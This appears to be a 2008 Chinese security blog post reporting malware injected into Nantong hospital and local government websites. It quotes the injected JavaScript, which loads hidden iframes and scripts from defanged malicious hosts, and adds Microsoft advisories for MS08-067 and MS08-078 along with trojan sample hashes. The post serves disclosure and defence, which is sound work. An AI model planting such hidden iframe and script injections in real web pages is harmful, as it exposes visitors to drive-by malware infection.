ntzyy.com       南通市中医院
nhtcm.com       南通市中医院
ntskqyy.com     南通市口腔医院
ntyxh.com       南通市医学会
ntfkyy.com      南通市肺科医院
南通美容整形.com 中文域名

恶意代码如下：

"%73%70%6F%72%74%73%62%61%79%2E%63%6E"
download：hxxp://d.fgddx.com/xx/x2.css

google显示以前受过攻击，还有有私服建立，这就是南通服务器安全水平？

疑为内部网络安全受ARP攻击威胁

试想中国大陆潜在的那么多贪赃枉法者，何时才能被挖出并绳之以法！

C.I.S.R.T.

Email:killvir@cisrt.org

Please compress files in .RAR or .ZIP file and add the password: virus

摘要
此安全更新解决了一个公开披露的漏洞。 如果用户使用 Internet Explorer 查看特制网页，则该漏洞可能允许远程执行代码。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。

对于 Internet Explorer 5.01、Internet Explorer 6、Internet Explorer 6 Service Pack 1 和 Internet Explorer 7，此安全更新的等级为“严重”。有关 Internet Explorer 8 Beta 2 的信息，请参阅“与此安全更新相关的常见问题 (FAQ)”部分。 有关详细信息，请参阅本节中“受影响和不受影响的软件”小节。

此安全更新通过修改 Internet Explorer 验证数据绑定参数并处理产生可利用条件的错误的方式来消除此漏洞。 有关漏洞的详细信息，请参阅下一节“漏洞信息”下面的常见问题 (FAQ) 小节。

此安全更新也解决了 Microsoft 安全通报 961051 中最初描述的漏洞。

建议。 Microsoft 建议用户立即应用此更新。

已知问题。 无

详情：http://www.microsoft.com/china/technet/security/bulletin/MS08-078.mspx

受影响软件：Internet Explorer 5.01、Internet Explorer 6、Internet Explorer 6 Service Pack 1 和 Internet Explorer 7

主要是该马中含有MS08067漏洞攻击模块，建议大家根据自身系统打全它！

http://www.microsoft.com/china/technet/security/bulletin/MS08-067.mspx

Microsoft 安全公告 MS08-067 - 严重
服务器服务中的漏洞可能允许远程执行代码 (958644)
发布日期： 十月 23, 2008
版本： 1.0
摘要
此安全更新解决了服务器服务中一个秘密报告的漏洞。 如果用户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。

对于 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 的所有受支持版本，此安全更新的等级为“严重”；对于 Windows Vista、Windows Server 2008 和 Windows 7 Beta 的所有受支持版本，此安全更新的等级为“重要”。 有关详细信息，请参阅本节中“受影响和不受影响的软件”小节。

该安全更新通过更正服务器服务处理 RPC 请求的方式来解决该漏洞。 有关漏洞的详细信息，请参阅下一节“漏洞信息”下面特定漏洞条目的常见问题 (FAQ) 小节。

建议。 Microsoft 建议用户立即应用此更新

在脚本hxxp://www.jschongchuan.lss.gov.cn/FS_Inc/Prototype.js
底部被注入代码如下：
document.write("<script src=\"hxxp://www.iis51.com/cms_app/ad_4.js\"><\/script>");
内容为：
function Get(){
var Then = new Date()
Then.setTime(Then.getTime() + 24*60*60*1000)
var cookieString = new String(document.cookie)
var cookieHeader = "Cookie1="
var beginPosition = cookieString.indexOf(cookieHeader)
if (beginPosition != -1){
} else
{ document.cookie = "Cookie1=risb;expires="+ Then.toGMTString()
document.write("<div style=\"display:none\">");
document.writeln("<iframe src=\"hxxp://www.hryspao.cn/one/a11.htm\"width=50 height=0></iframe>");
document.write ('<script language="javascript" type="text/javascript" src="hxxp://js.users.51.la/2056079.js"></script>');
}
}Get();

另一脚本hxxp://www.jschongchuan.lss.gov.cn/Ads/2.js
底部被注入代码如下：
document.write('<iframe height=0 width=0 src="hxxp://cncncncncncncncncncncncncncncn.cn/ie.htm?id=999"></iframe>');

第一个被挂的是当前正在流行的木马群，第二个是SEX网弹窗刷流量。南通市 崇川区 人事劳动和社会保障局网，这样一个公开与民众紧密相关的政务网站，它的安全性确实值得关注！

Creating an "AVZ Sysinfo log" using KAV/KIS 2009

If you are having a problem with an infection that is not detected/can not be deleted by Kaspersky, or an AVZ log has been requested by a moderator, please follow the instructions below on creating it.

To create an AVZ logfile, please launch Kaspersky and click on "Support" in the bottom left hand corner of the main screen. Then click on "Support Tools". A new window will open, and underneath the "Actions" heading you will find a button labelled "Create system state report". Click this button to create the AVZ sysinfo log.

Once your system has been analysed, click on "View" in order to open the logfile location.
The logfile should be located in C:\Documents and Settings\All Users\Application Data\Kaspersky Lab\AVP8\AVZ folder and will be called sysinfo.zip (for Windows Vista this will be C:\ProgramData\Kaspersky Lab\AVP8\AVZ). Please collect this file, and attach it to your post/topic.

The animation below demonstrates how to create an AVZ sysinfo logfile:

UPDATE(2008.10.28)

Microsoft Security Advisory (958963)

http://www.microsoft.com/technet/security/advisory/958963.mspx

Exploit Code Published Affecting the Server Service
Published: October 27, 2008

Microsoft is aware that detailed exploit code demonstrating code execution has been published on the Internet for the vulnerability that is addressed by security update MS08-067. This exploit code demonstrates code execution on Windows 2000, Windows XP, and Windows Server 2003. Microsoft is aware of limited, targeted active attacks that use this exploit code. At this time, there are no self-replicating attacks associated with this vulnerability. Microsoft has activated its Software Security Incident Response Process (SSIRP) and is continuing to investigate this issue.

Our investigation of this exploit code has verified that it does not affect customers who have installed the updates detailed in MS08-067 on their computers. Microsoft continues to recommend that customers apply the updates to the affected products by enabling the Automatic Updates feature in Windows.

We continue to work with our Microsoft Security Response Alliance (MSRA) and Microsoft Active Protections Program (MAPP) partners so that their products can provide additional protections for customers. We have updated our Windows Live Safety Scanner, Windows Live One Care, and Forefront security products with protections for customers. We have also been working with our partners in the Global Infrastructure Alliance for Internet Safety (GIAIS) program to take steps to help keep attacks from spreading.

Customers who believe they are affected can contact Customer Service and Support. Contact CSS in North America for help with security update issues or viruses at no charge using the PC Safety line (1-866-PCSAFETY). International customers may request help by using any method found at this location: http://www.microsoft.com/protect/support/default.mspx (click on the select your region hyperlink in the first paragraph).

Mitigating Factors:

Customers who have installed the MS08-067 security update are not affected by this vulnerability.

Windows 2000, Windows XP and Windows Server 2003 systems are primarily at risk from this vulnerability. Customers running these platforms should deploy MS08-067 as soon as possible.

While installation of the update is the recommended action, customers who have applied the mitigations as identified in MS08-067 will have minimized their exposure and potential exploitability against an attack.

General Information
Overview

Purpose of Advisory: Notification of the availability of a security update to help protect against this potential threat.

Advisory Status: As this issue is already addressed as part of the MS08-067 security bulletin, no additional update is required.

Recommendation: Install the MS08-067 security update to help protect against this vulnerability.

References Identification
CVE Reference
CVE-2008-4250

Microsoft Knowledge Base Article
958963

Microsoft Security Bulletin
MS08-067

CERT Reference
VU#827267

This advisory discusses the following software.

Related Software
Microsoft Windows 2000 Service Pack 4

Windows XP Service Pack 2 and Windows XP Service Pack 3

Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2

Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2

Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2

Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems

Top of section
Frequently Asked Questions

What is the scope of the advisory?
Microsoft is aware of public posting of exploit code targeting the vulnerability identified in Microsoft Security Update MS08-067. This affects the software that is listed in the “Overview” section.

Is this a security vulnerability that requires Microsoft to issue a security update?
Microsoft addressed this security vulnerability in MS08-067. Customers who have installed the MS08-067 security update are not affected by this vulnerability. No additional update is required.

What causes the vulnerability?
The Server service does not properly handle specially crafted RPC requests.

What might an attacker use the vulnerability to do?
An attacker could exploit this vulnerability over RPC without authentication to run arbitrary code. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

What is the Server service?
The Server service provides RPC support, file and print support, and named pipe sharing over the network. The Server service allows the sharing of your local resources (such as disks and printers) so that other users on the network can access them. It also allows named pipe communication between applications running on other computers and your computer, which is used for RPC.

What is RPC?
Remote Procedure Call (RPC) is a protocol that a program can use to request a service from a program located on another computer in a network. RPC helps with interoperability because the program using RPC does not have to understand the network protocols that are supporting communication. In RPC, the requesting program is the client and the service-providing program is the server.

Are there any known issues with installing the Microsoft Security Update that protects against this threat?
No. Microsoft continues to encourage customers to install the update immediately.

Top of section
Suggested Actions

If you have installed the update released with Security Bulletin MS08-067, you are already protected from the attack identified in the publicly posted proof of concept code. If you have not installed the update, you are encouraged to apply the workarounds identified in MS08-067.

Protect Your PC

We continue to encourage customers to follow our Protect Your Computer guidance of enabling a firewall, getting software updates and installing antivirus software. Customers can learn more about these steps by visiting Protect Your Computer.

Keep Windows Updated

All Windows users should apply the latest Microsoft security updates to help make sure that their computers are as protected as possible. If you are not sure whether your software is up to date, visit Windows Update, scan your computer for available updates, and install any high-priority updates that are offered to you. If you have Automatic Updates enabled, the updates are delivered to you when they are released, but you have to make sure you install them.

Apply workarounds listed in the Microsoft Bulletin

Security Bulletin MS08-067 lists the applicable workarounds that can be used to protect systems from this vulnerability.

Top of section
Resources:

You can provide feedback by completing the form by visiting Microsoft Help and Support: Contact Us.

Customers in the United States and Canada can receive technical support from Microsoft Product Support Services. For more information about available support options, see Microsoft Help and Support.

International customers can receive support from their local Microsoft subsidiaries. For more information about how to contact Microsoft for international support issues, visit International Support.

Microsoft TechNet Security provides additional information about security in Microsoft products.

Disclaimer:

The information provided in this advisory is provided "as is" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.

Revisions:

October 27, 2008: Advisory published

http://blogs.technet.com/msrc/archive/2008/10/27/microsoft-security-advisory-958963.aspx

Monday, October 27, 2008 3:26 PM by MSRCTEAM
Microsoft Security Advisory 958963
Hey folks, Mike Reavey here,

It’s been almost five days since we originally released MS08-067, and our tracking shows that security deployments remain strong.   We’re also still unaware of any application compatibility issues with this update.

Like we’ve said, we’re continuing to watch the threat environment. Yesterday, we said that our analysis of public exploit code that was available showed it would always result in a denial of service. Today, we’ve identified the public availability of exploit code that now shows code execution for the vulnerability addressed by MS08-067. This exploit code has been shown to result in remote code execution on Windows Server 2003, Windows XP, and Windows 2000 systems. Our investigation has shown that it does not affect customers who have installed the update. We’ve just published Microsoft Security Advisory 958963 to let customers know about this new development.

At this time, attacks are still limited and targeted, even with the release of this new exploit code.   The malware situation remains the same, as we’ve not seen any self-replicating worms, but instead malware that would be classified as Trojans -- specifically the malware we discussed when we released the security update on Thursday.

While there are no new broad attacks from this public exploit code now, we do expect that over the next few days and weeks this public exploit code may likely be used to create new versions of malware that could be used for broader attacks, possibly including self-replicating worms.   Therefore, we continue to strongly encourage customers to test and deploy the security update as quickly as possible.

We will continue to monitor the situation via our ongoing Software Security Incident Response Process (SSIRP) and post updates to the Advisory and the MSRC Blog as we become aware of malware that significantly changes the threat environment.

In the meantime, we continue to urge customers to continue to test and deploy the security update.

-Mike Reavey

McAfee：http://vil.nai.com/vil/content/v_152892.htm

dc3fdfde66fffb6cfbec946a237787d8 n1.exe_
f173007fbd8e2190af3be7837acd70a4 n2.exe_
3ee354cc8b63b8849b28e6f376f2b263 n3.exe_
6c3e53864541bb13fa7853f7b580b807 n4.exe_
24cd978da62cff8370b83c26e134ff4c n5.exe_
86d75ae361637a8f9114bb3a40f710d3 n6.exe_
ee70f981514803e1fb4e6b65f492a56d n7.exe_
8d66f28d028a4838d09ce4b91d35b7cb n8.exe_
477aac8d472a7bea8b906718a2f50c67 n9.exe_

http://hi.baidu.com/micropoint/blog/item/176ed10983e66784d1581b11.html